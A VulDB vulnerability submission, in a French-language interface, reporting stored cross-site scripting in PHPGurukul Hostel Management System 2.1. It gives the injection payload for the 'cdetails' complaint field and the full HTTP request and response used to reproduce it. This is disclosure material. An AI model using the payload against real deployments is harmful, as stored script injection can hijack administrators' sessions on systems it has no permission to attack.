Soumettre #698995: PHPGurukul Hostel Management System 2.1 Stored Cross Site Scriptinginformation

TitrePHPGurukul Hostel Management System 2.1 Stored Cross Site Scripting
DescriptionHostel management system has Stored Xss vulnerability. When you are on the register-complaint.php, you can enter the "><script>prompt(1)</script> payload that field. After that if you woudl like to see all complaints via all-complaints.php from admin page, you can click that record and you can see trigerred stored xss payload. Request: POST /hostel/register-complaint.php HTTP/1.1 Host: localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate, br Referer: http://localhost:8080/hostel/register-complaint.php Cookie: PHPSESSID=v3lgmjkcn4an87ju2n2jcv6vf4 Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------253251627419174 Content-Length: 533 -----------------------------253251627419174 Content-Disposition: form-data; name="ctype" Electrical -----------------------------253251627419174 Content-Disposition: form-data; name="cdetails" "><script>prompt(1)</script> -----------------------------253251627419174 Content-Disposition: form-data; name="image"; filename="" ..... Response: HTTP/1.1 200 OK Date: Thu, 20 Nov 2025 22:01:27 GMT Server: Apache/2.4.4 (Win64) PHP/5.4.12 X-Powered-By: PHP/5.4.12 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 5745 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html <script>alert('Complaint registerd. Complaint number is : is: 424986981');</script><script type='text/javascript'> document.location = 'my-complaints.php'; </script> <!doctype html> <html lang="en" class="no-js"> <head> <meta charset="UTF-8"> ......
Utilisateur
 harun.tamokur (UID 35839)
Soumission20/11/2025 23:02 (il y a 5 mois)
Modérer23/11/2025 08:57 (2 days later)
StatutAccepté
Entrée VulDB333341 [PHPGurukul Hostel Management System 2.1 /register-complaint.php cdetails cross site scripting]
Points17

PrécédentAperçuSuivant

Want to know what is going to be exploited?

We predict KEV entries!